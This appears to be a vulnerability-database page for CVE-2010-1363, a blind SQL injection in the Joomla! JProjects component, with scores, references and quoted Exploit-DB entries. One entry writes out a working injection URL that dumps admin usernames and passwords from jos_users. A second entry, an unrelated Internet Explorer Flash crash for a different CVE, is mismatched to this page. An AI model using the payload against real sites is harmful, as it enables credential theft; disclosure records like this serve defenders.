CVE-2010-1363
Published 2010-04-13
Priority P344 | high | CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.00% (58.5th percentile)
SQL injection vulnerability in the JProjects (com_j-projects) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the project parameter in a projects action to index.php.
No detection rules found.
Exploit-DB
Microsoft Internet Explorer 6/7/8 - Shockwave Flash Object Denial of Service
exploitdb·2010-01-18
CVE-2010-0187 Microsoft Internet Explorer 6/7/8 - Shockwave Flash Object Denial of Service
---
# Version: 6/7/8
# Tested on: Windows XP SP3 English & Windows 7
# CVE :
# Code: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/11182.tar.gz (ie_crash.tar.gz)
Description: Modified 1360. byte to 44, 1361. to 43, 1362. 42, 1363.
byte to 41 of a sample swf file, ran it and crash occurred.
Screenshots:
Internet Explorer 6 - XP SP3 - http://www.mertsarica.com/images/ie6_xp_sp3_3.jpg
Internet Explorer 7 - XP SP3 - http://www.mertsarica.com/images/ie7_xp_sp3_1.jpg
Internet Explorer 8 - Windows 7 - http://www.mertsarica.com/images/ie8_win7.jpg
Exploit-DB
Joomla! Component com_j-projects - Blind SQL Injection
exploitdb·2010-01-04
CVE-2010-1363 Joomla! Component com_j-projects - Blind SQL Injection
---
#############################################################
# Joomla Component com_j-projects Blind SQL Injection Vulnerability
#############################################################
# Author : Pyske
# Name : com_j-projects
# Bug Type : Blind SQL Injection
# Infection : Admin login credentials can be obtained.
# Bug Fix Advice : Malicious characters should be filtered.
#############################################################
path /index.php?option=com_j-projects&Itemid=102&cat=5&task=projects&project=30/**/and/**/1=0/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users
No writeups or analysis indexed.
References:
http://packetstormsecurity.org/1001-exploits/joomlajprojects-sql.txt
http://www.exploit-db.com/exploits/10988
http://www.securityfocus.com/bid/37608
http://www.vupen.com/english/advisories/2010/0049
https://exchange.xforce.ibmcloud.com/vulnerabilities/55361
Published: 2010-04-13